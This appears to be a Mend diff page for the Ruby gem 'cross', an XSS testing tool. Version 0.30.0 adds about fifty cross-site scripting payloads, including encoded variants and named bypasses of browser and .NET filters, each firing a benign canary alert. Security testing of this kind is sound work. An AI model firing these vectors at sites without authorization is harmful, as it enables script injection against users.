RubyGems - cross - Versions diffs - 0.20.0 → 0.30.0 - Mend

cross 0.20.0 → 0.30.0

Files changed (4) hide show

data/lib/cross/version.rb CHANGED Viewed

@@ -1,3 +1,3 @@
 module Cross
-  VERSION = "0.20.0"
+  VERSION = "0.30.0"
 end

data/lib/cross/xss.rb CHANGED Viewed

@@ -9,7 +9,56 @@ module Cross
           "/--><script>alert('cross canary');</script>",
           "/--></ScRiPt><ScRiPt>alert('cross canary');</ScRiPt>",
           "//;-->alert('cross canary');",
-          "\"//;\nalert('cross canary');"
+          "\"//;\nalert('cross canary');",
+          # more exotic vectors (antisnatchor's collection)
+          "<script/anyjunk>alert('cross canary')</script>",
+          "<<script>alert('cross canary');//<</script>",
+          "<img onerror=alert('cross canary') src=a>",
+          "<xml onreadystatechange=alert('cross canary')>",
+          "<style onreadystatechange=alert('cross canary')>",
+          "<iframe onreadystatechange=alert('cross canary')>",
+          "<object onerror=alert('cross canary')>",
+          "<object type=image src=/images/live.gif onreadystatechange=alert('cross canary')></object>",
+          "<img type=image src=/images/live.gif onreadystatechange=alert('cross canary')>",
+          "<input type=image src=/images/live.gif onreadystatechange=alert('cross canary')>",
+          "<isindex type=image src=/images/live.gif onreadystatechange=alert('cross canary')>",
+          "<script onreadystatechange=alert('cross canary')>",
+          "<bgsound onpropertychange=alert('cross canary')>",
+          "<body onbeforeactivate=alert('cross canary')>",
+          "<body onfocusin=alert('cross canary')>",
+          "<input autofocus onfocus=alert('cross canary')>",
+          "<input onblur=alert('cross canary') autofocus><input autofocus>",
+          "<body onscroll=alert('cross canary')><br><br>...<br><input autofocus>",
+          "</a onmousemove=alert('cross canary')>",
+          "<video src=1 onerror=alert('cross canary')>",
+          "<audio src=1 onerror=alert('cross canary')>",
+          "<object data=javascript:alert('cross canary')>",
+          "<iframe src=javascript:alert('cross canary')>",
+          "<embed src=javascript:alert('cross canary')>",
+          "<form id=test /><button form=test formaction=javascript:alert('cross canary')>",
+          "<event-source src=javascript:alert('cross canary')>",
+          "<x style=behavior:url(#default#time2) onbegin=alert('cross canary')>",
+          "<x style=x:expression(alert('cross canary'))>",
+          "<x onclick=alert('cross canary') src=a>Click here</x>",
+          "<img onerror=\"alert('cross canary')\"src=a>",
+          "<img onerror=`alert('cross canary')`src=a>",
+          "<img/onerror=\"alert('cross canary')\"src=a>",
+          "<img onerror=a&#x6c;ert('cross canary') src=a>",
+          "<img onerror=a&#x06c;ert('cross canary') src=a>",
+          "<img onerror=a&#x006c;ert('cross canary') src=a>",
+          "<img onerror=a&#x0006c;ert('cross canary') src=a>",
+          "<img onerror=a&#108;ert('cross canary') src=a>",
+          "<img onerror=a&#0108;ert('cross canary') src=a>",
+          "<img onerror=a&#0108;ert('cross canary') src=a>",
+          "<img onerror=a&#108ert('cross canary') src=a>",
+          "<img onerror=a&#0108ert('cross canary') src=a>",
+          "<script>function::['alert']('cross canary')</script>",
+          "<svg><script>//&#x0A;alert('cross canary')</script>", #Chrome <= 18 XssAuditor bypass
+          "<script>/*///*/alert('cross canary');</script>", #Chrome <= 20 XssAuditor bypass
+          "<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('cross canary'))>", #.NET RequestValidator bypass
+          "+ADw-script+AD4-alert('cross canary')+ADw-/script+AD4-", # UTF-7
+          "},alert('cross canary'),function x(){//", # DOM breaker
+          "\\x3c\\x73\\x63\\x72\\x69\\x70\\x74\\x3ealert('cross canary')\\x3c\\x2f\\x73\\x63\\x72\\x69\\x70\\x74\\x3e" #DOM-based innerHTML injection
         ]
         evasions.each do |pattern|
           yield pattern if block_given?

metadata CHANGED Viewed

@@ -1,7 +1,7 @@
 --- !ruby/object:Gem::Specification
 name: cross
 version: !ruby/object:Gem::Version
-  version: 0.20.0
+  version: 0.30.0
   prerelease:
 platform: ruby
 authors:
@@ -121,7 +121,6 @@ files:
 - .rvmrc
 - Gemfile
 - LICENSE
-- README.md
 - README.rdoc
 - Rakefile
 - VERSION
@@ -147,7 +146,7 @@ required_ruby_version: !ruby/object:Gem::Requirement
       version: '0'
       segments:
       - 0
-      hash: 487062861682332119
+      hash: 3227883298359843932
 required_rubygems_version: !ruby/object:Gem::Requirement
   none: false
   requirements:
@@ -156,7 +155,7 @@ required_rubygems_version: !ruby/object:Gem::Requirement
       version: '0'
       segments:
       - 0
-      hash: 487062861682332119
+      hash: 3227883298359843932
 requirements: []
 rubyforge_project:
 rubygems_version: 1.8.24

data/README.md DELETED Viewed

@@ -1,29 +0,0 @@
-# Cross
-TODO: Write a gem description
-## Installation
-Add this line to your application's Gemfile:
-    gem 'cross'
-And then execute:
-    $ bundle
-Or install it yourself as:
-    $ gem install cross
-## Usage
-TODO: Write usage instructions here
-## Contributing
-1. Fork it
-2. Create your feature branch (`git checkout -b my-new-feature`)
-3. Commit your changes (`git commit -am 'Added some feature'`)
-4. Push to the branch (`git push origin my-new-feature`)
-5. Create new Pull Request